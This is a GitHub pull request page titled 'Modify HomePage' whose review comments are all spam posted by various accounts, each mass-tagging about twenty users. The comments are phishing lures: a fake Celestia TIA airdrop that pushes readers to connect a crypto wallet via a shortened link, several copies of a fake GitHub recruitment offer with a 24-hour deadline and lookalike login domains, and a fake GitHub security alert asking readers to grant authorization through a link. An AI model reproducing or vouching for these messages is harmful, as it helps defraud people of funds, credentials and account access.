### PR TITLE
Modify HomePage

### PR DESCRIPTION
**Pull request by fnkk**
Modify HomePage

### CODE REVIEW

**Comment by lupu2022** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[Celestia Banner](https://bit.ly/celestiarewards)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://bit.ly/celestiarewards) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!wuwenlonguyita, @Shammi98, @nitantchhajed, @GrapeBaBa, @lrettig, @akdilsiz, @accavdar, @Bavax83, @Bastiartworks, @yohangglobal, @0xG63136, @blastaway07, @papadritta, @annzelly, @anthonyoliai, @periority, @siliasi, @reza1mahb, @, @NakamotoFake

**Comment by lupu2022** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[Celestia Banner](https://bit.ly/celestiarewards)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://bit.ly/celestiarewards) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!

**Comment by ianaditama26** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
AsiemDan, @samui68400, @HollyNg16, @CAZINHO, @vitor2023222, @siraz3506, @MarcinSPro, @smanncsn, @jotyy, @brian-phm, @joker-9527-gc, @TT20022001, @lucasmenendez, @hasbiati, @qzz0518, @youngprogrammer11, @sugandi89, @zxl189, @fossilnationalhabitat, @ShabbirHasan1

**Comment by thangtq-pionero** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Pillsandelite, @ghsc1, @winkey62650, @sunwaylive, @a7dao, @antonga23, @waymobetta, @miguelmtzinf, @jackwu882002, @ehdrbs0318, @alejandroalffer, @lxj08193, @Jaguarmouse, @SamWarden, @cgencer, @Nemusonaneko, @PrognosticatorR, @hu53yin, @mnky4a6, @arbitrarily

**Comment by yannvr** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
0865480128, @Mavendrya, @tonysilwa, @LuozhuZhang, @0Kelv, @megan76165, @tiger0198, @hosfaraji, @nancygregdf3f, @grimmkeeper-here, @xjtuhorse, @ibrahimebci, @NixonetGodzillaYellow, @thikhanh262557, @eer32, @lagasuytinh-vb06, @garry573, @vbondarenko, @Zkkhurshid, @yusufali7777

**Comment by JGConsulting** [comment]
**Subject:** Your Dream Job Awaits: Apply Now to Join GitHub as a Developer!

Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
nodech, @superoptimo, @farzadz, @ducphamle2, @loqman, @hyoshida123, @jimzk, @ZiyedB, @omicsnut, @wzulfikar, @yhtoo, @wujunze, @JelaniThompson, @HAOYUatHZ, @tokyoliyi, @CoderDuMeng, @JulianoCristian, @berkesipka, @aliblackwell, @deblasis

**Comment by jddunn** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
gitferry, @serejandmyself, @Nikamit-rgb, @Boyaci16, @itpey, @xulis, @erdalsahan, @dnsmichi, @farshadsha, @mul1sh, @llllvvuu, @LeviScoffie, @gauxuhu08, @yzhaoyu, @smks17, @0xSocrates, @Lee22917239, @rhdhtmrm, @smhmayboudi, @VitoBlake

**Pull request merged**
